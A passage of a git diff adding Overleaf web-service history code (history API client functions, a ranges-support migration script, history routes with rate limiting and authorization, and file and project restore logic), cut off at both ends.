GLOBAL_BLOBS.add(blob._id) // CHANGE FROM SOURCE: only store hashes. 
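+    // Hashes collected here make getBlobLocation above resolve to the global
+    // bucket; e.g. a blob with hash 'abcdef01...' maps to global key
+    // 'ab/cd/ef01...' (illustrative hash, layout per makeGlobalKey).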
+ } +} + +// END copy from services/history-v1/storage/lib/blob_store/index.js + +async function initializeProject(projectId) { + const body = await fetchJson(`${settings.apis.project_history.url}/project`, { + method: 'POST', + json: { historyId: projectId.toString() }, + }) + const historyId = body && body.project && body.project.id + if (!historyId) { + throw new OError('project-history did not provide an id', { body }) + } + return historyId +} + +async function flushProject(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}/flush`, + { method: 'POST' } + ) + } catch (err) { + throw OError.tag(err, 'failed to flush project to project history', { + projectId, + }) + } +} + +async function deleteProjectHistory(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}`, + { method: 'DELETE' } + ) + } catch (err) { + throw OError.tag(err, 'failed to delete project history', { + projectId, + }) + } +} + +async function resyncProject(projectId, options = {}) { + const body = {} + if (options.force) { + body.force = options.force + } + if (options.origin) { + body.origin = options.origin + } + if (options.historyRangesMigration) { + body.historyRangesMigration = options.historyRangesMigration + } + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}/resync`, + { + method: 'POST', + json: body, + signal: AbortSignal.timeout(6 * 60 * 1000), + } + ) + } catch (err) { + throw OError.tag(err, 'failed to resync project history', { + projectId, + }) + } +} + +async function deleteProject(projectId, historyId) { + const tasks = [] + tasks.push(_deleteProjectInProjectHistory(projectId)) + if (historyId != null) { + tasks.push(_deleteProjectInFullProjectHistory(historyId)) + } + await Promise.all(tasks) + await HistoryBackupDeletionHandler.deleteProject(projectId) +} + +async function _deleteProjectInProjectHistory(projectId) { + try { + await fetchNothing( + `${settings.apis.project_history.url}/project/${projectId}`, + { method: 'DELETE' } + ) + } catch (err) { + throw OError.tag( + err, + 'failed to clear project history in project-history', + { projectId } + ) + } +} + +async function _deleteProjectInFullProjectHistory(historyId) { + try { + await fetchNothing(`${HISTORY_V1_URL}/projects/${historyId}`, { + method: 'DELETE', + basicAuth: HISTORY_V1_BASIC_AUTH, + }) + } catch (err) { + throw OError.tag(err, 'failed to clear project history', { historyId }) + } +} + +async function uploadBlobFromDisk(historyId, hash, byteLength, fsPath) { + const outStream = fs.createReadStream(fsPath) + + const url = `${HISTORY_V1_URL}/projects/${historyId}/blobs/${hash}` + await fetchNothing(url, { + method: 'PUT', + body: outStream, + headers: { 'Content-Length': byteLength }, // add the content length to work around problems with chunked encoding in node 18 + signal: AbortSignal.timeout(60 * 1000), + basicAuth: HISTORY_V1_BASIC_AUTH, + }) +} + +async function copyBlob(sourceHistoryId, targetHistoryId, hash) { + const url = `${HISTORY_V1_URL}/projects/${targetHistoryId}/blobs/${hash}` + await fetchNothing( + `${url}?${new URLSearchParams({ copyFrom: sourceHistoryId })}`, + { + method: 'POST', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) +} + +async function requestBlobWithFallback( + projectId, + hash, + fileId, + method = 'GET', + range = '' +) { + const project = await ProjectGetter.promises.getProject(projectId, { + 'overleaf.history.id': true, + }) + // Talk to history-v1 
directly to avoid streaming via project-history. + let url = new URL(HISTORY_V1_URL) + url.pathname += `/projects/${project.overleaf.history.id}/blobs/${hash}` + + const opts = { method, headers: { Range: range } } + let stream, response, source + try { + ;({ stream, response } = await fetchStreamWithResponse(url, { + ...opts, + basicAuth: { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, + }, + })) + source = 'history-v1' + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + if (ObjectId.isValid(fileId)) { + url = new URL(settings.apis.filestore.url) + url.pathname = `/project/${projectId}/file/${fileId}` + try { + ;({ stream, response } = await fetchStreamWithResponse(url, opts)) + } catch (err) { + if ( + err instanceof RequestFailedError && + err.response.status === 404 + ) { + throw new NotFoundError() + } + throw err + } + logger.warn({ projectId, hash, fileId }, 'missing history blob') + source = 'filestore' + } else { + throw new NotFoundError() + } + } else { + throw err + } + } + Metrics.inc('request_blob', 1, { path: source }) + return { + url, + stream, + source, + contentLength: response.headers.get('Content-Length'), + } +} + +/** + * Warning: Don't use this method for large projects. It will eagerly load all + * the history data and apply all operations. + * @param {string} projectId + * @returns Promise<object> + */ +async function getCurrentContent(projectId) { + const historyId = await getHistoryId(projectId) + + try { + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/latest/content`, + { + method: 'GET', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) + } catch (err) { + throw OError.tag(err, 'failed to load project history', { historyId }) + } +} + +/** + * Warning: Don't use this method for large projects. It will eagerly load all + * the history data and apply all operations. 
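+ *
+ * Usage sketch (the id and version below are illustrative, not fixtures):
+ *
+ *   const content = await getContentAtVersion('507f1f77bcf86cd799439011', 42)
+ *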
+ * @param {string} projectId + * @param {number} version + * + * @returns Promise<object> + */ +async function getContentAtVersion(projectId, version) { + const historyId = await getHistoryId(projectId) + + try { + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/versions/${version}/content`, + { + method: 'GET', + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) + } catch (err) { + throw OError.tag( + err, + 'failed to load project history snapshot at version', + { historyId, version } + ) + } +} + +/** + * Get the latest chunk from history + * + * @param {string} projectId + */ +async function getLatestHistory(projectId) { + const historyId = await getHistoryId(projectId) + + return await fetchJson( + `${HISTORY_V1_URL}/projects/${historyId}/latest/history`, + { + basicAuth: HISTORY_V1_BASIC_AUTH, + } + ) +} + +/** + * Get history changes since a given version + * + * @param {string} projectId + * @param {object} opts + * @param {number} opts.since - The start version of changes to get + */ +async function getChanges(projectId, opts = {}) { + const historyId = await getHistoryId(projectId) + + const url = new URL(`${HISTORY_V1_URL}/projects/${historyId}/changes`) + if (opts.since) { + url.searchParams.set('since', opts.since) + } + + return await fetchJson(url, { + basicAuth: HISTORY_V1_BASIC_AUTH, + }) +} + +async function getHistoryId(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + const historyId = project?.overleaf?.history?.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + return historyId +} + +async function injectUserDetails(data) { + // data can be either: + // { + // diff: [{ + // i: "foo", + // meta: { + // users: ["user_id", v1_user_id, ...] + // ... + // } + // }, ...] + // } + // or + // { + // updates: [{ + // pathnames: ["main.tex"] + // meta: { + // users: ["user_id", v1_user_id, ...] + // ... + // }, + // ... + // }, ...] + // } + // Either way, the top level key points to an array of objects with a meta.users property + // that we need to replace user_ids with populated user objects. + // Note that some entries in the users arrays may be v1 ids returned by the v1 history + // service. v1 ids will be `numbers` + let userIds = new Set() + let v1UserIds = new Set() + const entries = Array.isArray(data.diff) + ? data.diff + : Array.isArray(data.updates) + ? 
data.updates + : [] + for (const entry of entries) { + for (const user of (entry.meta && entry.meta.users) || []) { + if (typeof user === 'string') { + userIds.add(user) + } else if (typeof user === 'number') { + v1UserIds.add(user) + } + } + } + + userIds = Array.from(userIds) + v1UserIds = Array.from(v1UserIds) + const projection = { first_name: 1, last_name: 1, email: 1 } + const usersArray = await UserGetter.promises.getUsers(userIds, projection) + const users = {} + for (const user of usersArray) { + users[user._id.toString()] = _userView(user) + } + projection.overleaf = 1 + const v1IdentifiedUsersArray = await UserGetter.promises.getUsersByV1Ids( + v1UserIds, + projection + ) + for (const user of v1IdentifiedUsersArray) { + users[user.overleaf.id] = _userView(user) + } + for (const entry of entries) { + if (entry.meta != null) { + entry.meta.users = ((entry.meta && entry.meta.users) || []).map(user => { + if (typeof user === 'string' || typeof user === 'number') { + return users[user] + } else { + return user + } + }) + } + } + return data +} + +function _userView(user) { + const { _id, first_name: firstName, last_name: lastName, email } = user + return { first_name: firstName, last_name: lastName, email, id: _id } +} + +module.exports = { + getBlobLocation, + initializeProject: callbackify(initializeProject), + flushProject: callbackify(flushProject), + resyncProject: callbackify(resyncProject), + deleteProject: callbackify(deleteProject), + deleteProjectHistory: callbackify(deleteProjectHistory), + injectUserDetails: callbackify(injectUserDetails), + getCurrentContent: callbackify(getCurrentContent), + uploadBlobFromDisk: callbackify(uploadBlobFromDisk), + copyBlob: callbackify(copyBlob), + requestBlobWithFallback: callbackify(requestBlobWithFallback), + getLatestHistory: callbackify(getLatestHistory), + getChanges: callbackify(getChanges), + promises: { + loadGlobalBlobs, + initializeProject, + flushProject, + resyncProject, + deleteProject, + injectUserDetails, + deleteProjectHistory, + getCurrentContent, + getContentAtVersion, + uploadBlobFromDisk, + copyBlob, + requestBlobWithFallback, + getLatestHistory, + getChanges, + }, +} diff --git a/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs b/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs new file mode 100644 index 0000000..e76267a --- /dev/null +++ b/services/web/app/src/Features/History/HistoryRangesSupportMigration.mjs @@ -0,0 +1,272 @@ +// @ts-check + +import { callbackify } from 'node:util' +import OError from '@overleaf/o-error' +import logger from '@overleaf/logger' +import HistoryManager from '../History/HistoryManager.js' +import DocumentUpdaterHandler from '../DocumentUpdater/DocumentUpdaterHandler.js' +import DocstoreManager from '../Docstore/DocstoreManager.js' +import ProjectOptionsHandler from '../Project/ProjectOptionsHandler.js' +import mongodb from '../../infrastructure/mongodb.js' + +const { db, ObjectId, READ_PREFERENCE_SECONDARY } = mongodb + +/** + * Migrate projects based on a query. 
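+ *
+ * Example invocation (the option values shown are illustrative):
+ *
+ *   await migrateProjects({ direction: 'forwards', concurrency: 10, maxCount: 1000 })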
+ * + * @param {object} opts + * @param {string[]} [opts.projectIds] + * @param {string[]} [opts.ownerIds] + * @param {string} [opts.minId] + * @param {string} [opts.maxId] + * @param {number} [opts.maxCount] + * @param {"forwards" | "backwards"} [opts.direction] + * @param {boolean} [opts.force] + * @param {boolean} [opts.stopOnError] + * @param {boolean} [opts.quickOnly] + * @param {number} [opts.concurrency] + */ +async function migrateProjects(opts = {}) { + const { + ownerIds, + projectIds, + minId, + maxId, + maxCount = Infinity, + direction = 'forwards', + force = false, + stopOnError = false, + quickOnly = false, + concurrency = 1, + } = opts + + const clauses = [] + + // skip projects that don't have full project history + clauses.push({ 'overleaf.history.id': { $exists: true } }) + + if (projectIds != null) { + clauses.push({ _id: { $in: projectIds.map(id => new ObjectId(id)) } }) + } + if (ownerIds != null) { + clauses.push({ owner_ref: { $in: ownerIds.map(id => new ObjectId(id)) } }) + } + if (minId) { + clauses.push({ _id: { $gte: new ObjectId(minId) } }) + } + if (maxId) { + clauses.push({ _id: { $lte: new ObjectId(maxId) } }) + } + + const filter = {} + if (clauses.length > 0) { + filter.$and = clauses + } + + const projects = db.projects + .find(filter, { + readPreference: READ_PREFERENCE_SECONDARY, + projection: { _id: 1, overleaf: 1 }, + }) + .sort({ _id: -1 }) + + let terminating = false + const handleSignal = signal => { + logger.info({ signal }, 'History ranges support migration received signal') + terminating = true + } + process.on('SIGINT', handleSignal) + process.on('SIGTERM', handleSignal) + + const projectsProcessed = { + quick: 0, + skipped: 0, + resync: 0, + total: 0, + } + const jobsByProjectId = new Map() + let errors = 0 + + for await (const project of projects) { + if (projectsProcessed.total >= maxCount) { + break + } + + if (errors > 0 && stopOnError) { + break + } + + if (terminating) { + break + } + + const projectId = project._id.toString() + + if (!force) { + // Skip projects that are already migrated + if ( + (direction === 'forwards' && + project.overleaf.history.rangesSupportEnabled) || + (direction === 'backwards' && + !project.overleaf.history.rangesSupportEnabled) + ) { + continue + } + } + + if (jobsByProjectId.size >= concurrency) { + // Wait until the next job finishes + await Promise.race(jobsByProjectId.values()) + } + + const job = processProject(projectId, direction, quickOnly) + .then(info => { + jobsByProjectId.delete(projectId) + projectsProcessed[info.migrationType] += 1 + projectsProcessed.total += 1 + logger.debug( + { + projectId, + direction, + projectsProcessed, + errors, + ...info, + }, + 'History ranges support migration' + ) + if (projectsProcessed.total % 10000 === 0) { + logger.info( + { projectsProcessed, errors, lastProjectId: projectId }, + 'History ranges support migration progress' + ) + } + }) + .catch(err => { + jobsByProjectId.delete(projectId) + errors += 1 + logger.error( + { err, projectId, direction, projectsProcessed, errors }, + 'Failed to migrate history ranges support' + ) + }) + + jobsByProjectId.set(projectId, job) + } + + // Let the last jobs finish + await Promise.all(jobsByProjectId.values()) +} + +/** + * Migrate a single project + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + * @param {boolean} quickOnly + */ +async function processProject(projectId, direction, quickOnly) { + const startTimeMs = Date.now() + const quickMigrationSuccess = await 
quickMigration(projectId, direction) + let migrationType + if (quickMigrationSuccess) { + migrationType = 'quick' + } else if (quickOnly) { + migrationType = 'skipped' + } else { + await migrateProject(projectId, direction) + migrationType = 'resync' + } + const elapsedMs = Date.now() - startTimeMs + return { migrationType, elapsedMs } +} + +/** + * Attempt a quick migration (without resync) + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + * @return {Promise<boolean>} whether or not the quick migration was a success + */ +async function quickMigration(projectId, direction = 'forwards') { + const blockSuccess = + await DocumentUpdaterHandler.promises.blockProject(projectId) + if (!blockSuccess) { + return false + } + + let projectHasRanges + try { + projectHasRanges = + await DocstoreManager.promises.projectHasRanges(projectId) + } catch (err) { + // Docstore request probably timed out. Assume the project has ranges + logger.warn( + { err, projectId }, + 'Failed to check if project has ranges; proceeding with a resync migration' + ) + projectHasRanges = true + } + if (projectHasRanges) { + await DocumentUpdaterHandler.promises.unblockProject(projectId) + return false + } + + try { + await ProjectOptionsHandler.promises.setHistoryRangesSupport( + projectId, + direction === 'forwards' + ) + } catch (err) { + await DocumentUpdaterHandler.promises.unblockProject(projectId) + await hardResyncProject(projectId) + throw err + } + + let wasBlocked + try { + wasBlocked = await DocumentUpdaterHandler.promises.unblockProject(projectId) + } catch (err) { + await hardResyncProject(projectId) + throw err + } + if (!wasBlocked) { + await hardResyncProject(projectId) + throw new OError('Tried to unblock project but it was not blocked', { + projectId, + }) + } + + return true +} + +/** + * Migrate a single project + * + * @param {string} projectId + * @param {"forwards" | "backwards"} direction + */ +async function migrateProject(projectId, direction = 'forwards') { + await HistoryManager.promises.flushProject(projectId) + await HistoryManager.promises.resyncProject(projectId, { + historyRangesMigration: direction, + }) +} + +/** + * Hard resync a project + * + * This is used when something goes wrong with the quick migration after we've + * changed the history ranges support flag on a project. 
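+ *
+ * It boils down to (as implemented below):
+ *
+ *   await HistoryManager.promises.flushProject(projectId)
+ *   await HistoryManager.promises.resyncProject(projectId, { force: true })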
+ * + * @param {string} projectId + */ +async function hardResyncProject(projectId) { + await HistoryManager.promises.flushProject(projectId) + await HistoryManager.promises.resyncProject(projectId, { force: true }) +} + +export default { + migrateProjects: callbackify(migrateProjects), + migrateProject: callbackify(migrateProject), + promises: { migrateProjects, migrateProject }, +} diff --git a/services/web/app/src/Features/History/HistoryRouter.mjs b/services/web/app/src/Features/History/HistoryRouter.mjs new file mode 100644 index 0000000..d5c7b46 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryRouter.mjs @@ -0,0 +1,179 @@ +// @ts-check + +import Settings from '@overleaf/settings' +import { Joi, validate } from '../../infrastructure/Validation.js' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import HistoryController from './HistoryController.js' + +const rateLimiters = { + downloadProjectRevision: new RateLimiter('download-project-revision', { + points: 30, + duration: 60 * 60, + }), + getProjectBlob: new RateLimiter('get-project-blob', { + // Download project in full once per hour + points: Settings.maxEntitiesPerProject, + duration: 60 * 60, + }), + flushHistory: new RateLimiter('flush-project-history', { + points: 30, + duration: 60, + }), +} + +function apply(webRouter, privateApiRouter) { + // Blobs + + webRouter.head( + '/project/:project_id/blob/:hash', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + hash: Joi.string().required().hex().length(40), + }), + query: Joi.object({ + fallback: Joi.objectId().optional(), + }), + }), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectBlob), + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.headBlob + ) + webRouter.get( + '/project/:project_id/blob/:hash', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + hash: Joi.string().required().hex().length(40), + }), + query: Joi.object({ + fallback: Joi.objectId().optional(), + }), + }), + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectBlob), + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getBlob + ) + + // History diffs + + webRouter.get( + '/project/:Project_id/updates', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApiAndInjectUserDetails + ) + webRouter.get( + '/project/:Project_id/doc/:doc_id/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + webRouter.get( + '/project/:Project_id/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApiAndInjectUserDetails + ) + webRouter.get( + '/project/:Project_id/filetree/diff', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + + // File and project restore + + webRouter.post( + '/project/:project_id/restore_file', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.restoreFileFromV2 + ) + webRouter.post( + 
'/project/:project_id/revert_file', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.revertFile + ) + webRouter.post( + '/project/:project_id/revert-project', + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + HistoryController.revertProject + ) + + // History download + + webRouter.get( + '/project/:project_id/version/:version/zip', + RateLimiterMiddleware.rateLimit(rateLimiters.downloadProjectRevision), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.downloadZipOfVersion + ) + + // History flush and resync + + webRouter.post( + '/project/:Project_id/flush', + RateLimiterMiddleware.rateLimit(rateLimiters.flushHistory), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.proxyToHistoryApi + ) + privateApiRouter.post( + '/project/:Project_id/history/resync', + AuthenticationController.requirePrivateApiAuth(), + HistoryController.resyncProjectHistory + ) + + // History labels + + webRouter.get( + '/project/:Project_id/labels', + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getLabels + ) + webRouter.post( + '/project/:Project_id/labels', + AuthorizationMiddleware.ensureUserCanWriteOrReviewProjectContent, + HistoryController.createLabel + ) + webRouter.delete( + '/project/:Project_id/labels/:label_id', + AuthorizationMiddleware.ensureUserCanWriteOrReviewProjectContent, + HistoryController.deleteLabel + ) + + // History snapshot + + webRouter.get( + '/project/:project_id/latest/history', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + }), + }), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getLatestHistory + ) + webRouter.get( + '/project/:project_id/changes', + validate({ + params: Joi.object({ + project_id: Joi.objectId().required(), + }), + query: Joi.object({ + since: Joi.number().integer().min(0).optional(), + }), + }), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + HistoryController.getChanges + ) +} + +export default { apply } diff --git a/services/web/app/src/Features/History/HistoryURLHelper.js b/services/web/app/src/Features/History/HistoryURLHelper.js new file mode 100644 index 0000000..8b8d8cb --- /dev/null +++ b/services/web/app/src/Features/History/HistoryURLHelper.js @@ -0,0 +1,21 @@ +// Pass settings to enable consistent unit tests from .js and .mjs modules +function projectHistoryURLWithFilestoreFallback( + Settings, + projectId, + historyId, + fileRef, + origin +) { + const filestoreURL = `${Settings.apis.filestore.url}/project/${projectId}/file/${fileRef._id}?from=${origin}` + // TODO: When this file is converted to ES modules we will be able to use Features.hasFeature('project-history-blobs'). Currently we can't stub the feature return value in tests. 
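+  // Result shape (sketch based on the branches below): with a file hash and
+  // the enableProjectHistoryBlobs setting on, callers get
+  //   { url: <project_history blob URL>, fallbackURL: <filestoreURL> }
+  // and otherwise just { url: <filestoreURL> }.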
+ if (fileRef.hash && Settings.enableProjectHistoryBlobs) { + return { + url: `${Settings.apis.project_history.url}/project/${historyId}/blob/${fileRef.hash}`, + fallbackURL: filestoreURL, + } + } else { + return { url: filestoreURL } + } +} + +module.exports = { projectHistoryURLWithFilestoreFallback } diff --git a/services/web/app/src/Features/History/RestoreManager.js b/services/web/app/src/Features/History/RestoreManager.js new file mode 100644 index 0000000..8c73695 --- /dev/null +++ b/services/web/app/src/Features/History/RestoreManager.js @@ -0,0 +1,388 @@ +const Settings = require('@overleaf/settings') +const Path = require('path') +const FileWriter = require('../../infrastructure/FileWriter') +const FileSystemImportManager = require('../Uploads/FileSystemImportManager') +const EditorController = require('../Editor/EditorController') +const Errors = require('../Errors/Errors') +const moment = require('moment') +const { callbackifyAll } = require('@overleaf/promise-utils') +const { fetchJson } = require('@overleaf/fetch-utils') +const ProjectLocator = require('../Project/ProjectLocator') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ChatApiHandler = require('../Chat/ChatApiHandler') +const DocstoreManager = require('../Docstore/DocstoreManager') +const logger = require('@overleaf/logger') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const ChatManager = require('../Chat/ChatManager') +const OError = require('@overleaf/o-error') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') + +const RestoreManager = { + async restoreFileFromV2(userId, projectId, version, pathname) { + const fsPath = await RestoreManager._writeFileVersionToDisk( + projectId, + version, + pathname + ) + const basename = Path.basename(pathname) + let dirname = Path.dirname(pathname) + if (dirname === '.') { + // no directory + dirname = '' + } + const parentFolderId = await RestoreManager._findOrCreateFolder( + projectId, + dirname, + userId + ) + const addEntityWithName = async name => + await FileSystemImportManager.promises.addEntity( + userId, + projectId, + parentFolderId, + name, + fsPath, + false + ) + return await RestoreManager._addEntityWithUniqueName( + addEntityWithName, + basename + ) + }, + + async revertFile(userId, projectId, version, pathname, options = {}) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + if (!project?.overleaf?.history?.rangesSupportEnabled) { + throw new OError('project does not have ranges support', { projectId }) + } + + const fsPath = await RestoreManager._writeFileVersionToDisk( + projectId, + version, + pathname + ) + const basename = Path.basename(pathname) + let dirname = Path.dirname(pathname) + if (dirname === '.') { + // root directory + dirname = '/' + } + const parentFolderId = await RestoreManager._findOrCreateFolder( + projectId, + dirname, + userId + ) + const file = await ProjectLocator.promises + .findElementByPath({ + project_id: projectId, + path: pathname, + }) + .catch(() => null) + + const updates = await RestoreManager._getUpdatesFromHistory( + projectId, + version + ) + const updateAtVersion = updates.find(update => update.toV === version) + + const origin = options.origin || { + kind: 'file-restore', + path: pathname, + version, + timestamp: new Date(updateAtVersion.meta.end_ts).toISOString(), + } + + const importInfo = await 
FileSystemImportManager.promises.importFile( + fsPath, + pathname + ) + + if (file) { + if (file.type !== 'doc' && file.type !== 'file') { + throw new OError('unexpected file type', { type: file.type }) + } + logger.debug( + { projectId, fileId: file.element._id, type: importInfo.type }, + 'deleting entity before reverting it' + ) + await EditorController.promises.deleteEntity( + projectId, + file.element._id, + file.type, + origin, + userId + ) + } + + const { metadata } = await RestoreManager._getMetadataFromHistory( + projectId, + version, + pathname + ) + + // Look for metadata indicating a linked file. + const isFileMetadata = metadata && 'provider' in metadata + + logger.debug({ metadata }, 'metadata from history') + + if (importInfo.type === 'file' || isFileMetadata) { + const newFile = await EditorController.promises.upsertFile( + projectId, + parentFolderId, + basename, + fsPath, + metadata, + origin, + userId + ) + + return { + _id: newFile._id, + type: 'file', + } + } + + const ranges = await RestoreManager._getRangesFromHistory( + projectId, + version, + pathname + ) + + const documentCommentIds = new Set( + ranges.comments?.map(({ op: { t } }) => t) + ) + + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const docsWithRanges = + await DocstoreManager.promises.getAllRanges(projectId) + + const nonOrphanedThreadIds = new Set() + for (const { ranges } of docsWithRanges) { + for (const comment of ranges.comments ?? []) { + nonOrphanedThreadIds.add(comment.op.t) + } + } + + const commentIdsToDuplicate = Array.from(documentCommentIds).filter(id => + nonOrphanedThreadIds.has(id) + ) + + const newRanges = { changes: ranges.changes, comments: [] } + + if (commentIdsToDuplicate.length > 0) { + const { newThreads: newCommentIds } = + await ChatApiHandler.promises.duplicateCommentThreads( + projectId, + commentIdsToDuplicate + ) + + logger.debug({ mapping: newCommentIds }, 'replacing comment threads') + + for (const comment of ranges.comments ?? []) { + if (Object.prototype.hasOwnProperty.call(newCommentIds, comment.op.t)) { + const result = newCommentIds[comment.op.t] + if (result.error) { + // We couldn't duplicate the thread, so we need to delete it from + // the resulting ranges. + continue + } + // We have a new id for this comment thread + comment.op.t = result.duplicateId + } + newRanges.comments.push(comment) + } + } else { + newRanges.comments = ranges.comments + } + + const newCommentThreadData = + await ChatApiHandler.promises.generateThreadData( + projectId, + newRanges.comments.map(({ op: { t } }) => t) + ) + + // Resolve/reopen threads in chat service to match what is in history + for (const commentRange of newRanges.comments) { + const threadData = newCommentThreadData[commentRange.op.t] + if (!threadData) { + // comment thread was deleted + continue + } + + if (commentRange.op.resolved && threadData.resolved == null) { + // The history snapshot stores the comment's resolved property as a boolean, + // but it does not include information about who resolved the comment or the timestamp. + // Until this is fixed, we will resolve the thread with the current user and the current timestamp. 
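+        // The calls below leave threadData mirroring the chat service, e.g.
+        //   { resolved: true, resolved_by_user_id: userId, resolved_at: <ISO timestamp> }
+        // (timestamp value is illustrative).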
+ await ChatApiHandler.promises.resolveThread( + projectId, + commentRange.op.t, + userId + ) + threadData.resolved = true + threadData.resolved_by_user_id = userId + threadData.resolved_at = new Date().toISOString() + } else if (!commentRange.op.resolved && threadData.resolved != null) { + await ChatApiHandler.promises.reopenThread(projectId, commentRange.op.t) + delete threadData.resolved + delete threadData.resolved_by_user_id + delete threadData.resolved_at + } + // remove the resolved property from the comment range as the chat service is synced at this point + delete commentRange.op.resolved + } + + await ChatManager.promises.injectUserInfoIntoThreads(newCommentThreadData) + + // Only keep restored comment ranges that point to a valid thread. + // The chat service won't have generated thread data for deleted threads. + newRanges.comments = newRanges.comments.filter( + comment => newCommentThreadData[comment.op.t] != null + ) + + logger.debug({ newCommentThreadData }, 'emitting new comment threads') + EditorRealTimeController.emitToRoom( + projectId, + 'new-comment-threads', + newCommentThreadData + ) + + const { _id } = await EditorController.promises.addDocWithRanges( + projectId, + parentFolderId, + basename, + importInfo.lines, + newRanges, + origin, + userId + ) + + return { + _id, + type: importInfo.type, + } + }, + + async _findOrCreateFolder(projectId, dirname, userId) { + const { lastFolder } = await EditorController.promises.mkdirp( + projectId, + dirname, + userId + ) + return lastFolder?._id + }, + + async _addEntityWithUniqueName(addEntityWithName, basename) { + try { + return await addEntityWithName(basename) + } catch (error) { + if (error instanceof Errors.DuplicateNameError) { + // Duplicate name, so try with a prefix + const date = moment(new Date()).format('Do MMM YY H:mm:ss') + // Move extension to the end so the file type is preserved + const extension = Path.extname(basename) + basename = Path.basename(basename, extension) + basename = `${basename} (Restored on ${date})` + if (extension !== '') { + basename = `${basename}${extension}` + } + return await addEntityWithName(basename) + } else { + throw error + } + } + }, + + async revertProject(userId, projectId, version) { + const project = await ProjectGetter.promises.getProject(projectId, { + overleaf: true, + }) + if (!project?.overleaf?.history?.rangesSupportEnabled) { + throw new OError('project does not have ranges support', { projectId }) + } + + // Get project paths at version + const pathsAtPastVersion = await RestoreManager._getProjectPathsAtVersion( + projectId, + version + ) + + const updates = await RestoreManager._getUpdatesFromHistory( + projectId, + version + ) + const updateAtVersion = updates.find(update => update.toV === version) + + const origin = { + kind: 'project-restore', + version, + timestamp: new Date(updateAtVersion.meta.end_ts).toISOString(), + } + + for (const pathname of pathsAtPastVersion) { + await RestoreManager.revertFile(userId, projectId, version, pathname, { + origin, + }) + } + + const entitiesAtLiveVersion = + await ProjectEntityHandler.promises.getAllEntities(projectId) + + const trimLeadingSlash = path => path.replace(/^\//, '') + + const pathsAtLiveVersion = entitiesAtLiveVersion.docs + .map(doc => doc.path) + .concat(entitiesAtLiveVersion.files.map(file => file.path)) + .map(trimLeadingSlash) + + // Delete files that were not present at the reverted version + for (const path of pathsAtLiveVersion) { + if (!pathsAtPastVersion.includes(path)) { + await 
EditorController.promises.deleteEntityWithPath( + projectId, + path, + origin, + userId + ) + } + } + }, + + async _writeFileVersionToDisk(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/version/${version}/${encodeURIComponent(pathname)}` + return await FileWriter.promises.writeUrlToDisk(projectId, url) + }, + + async _getRangesFromHistory(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/ranges/version/${version}/${encodeURIComponent(pathname)}` + return await fetchJson(url) + }, + + async _getMetadataFromHistory(projectId, version, pathname) { + const url = `${ + Settings.apis.project_history.url + }/project/${projectId}/metadata/version/${version}/${encodeURIComponent(pathname)}` + return await fetchJson(url) + }, + + async _getUpdatesFromHistory(projectId, version) { + const url = `${Settings.apis.project_history.url}/project/${projectId}/updates?before=${version}&min_count=1` + const res = await fetchJson(url) + return res.updates + }, + + async _getProjectPathsAtVersion(projectId, version) { + const url = `${Settings.apis.project_history.url}/project/${projectId}/paths/version/${version}` + const res = await fetchJson(url) + return res.paths + }, +} + +module.exports = { ...callbackifyAll(RestoreManager), 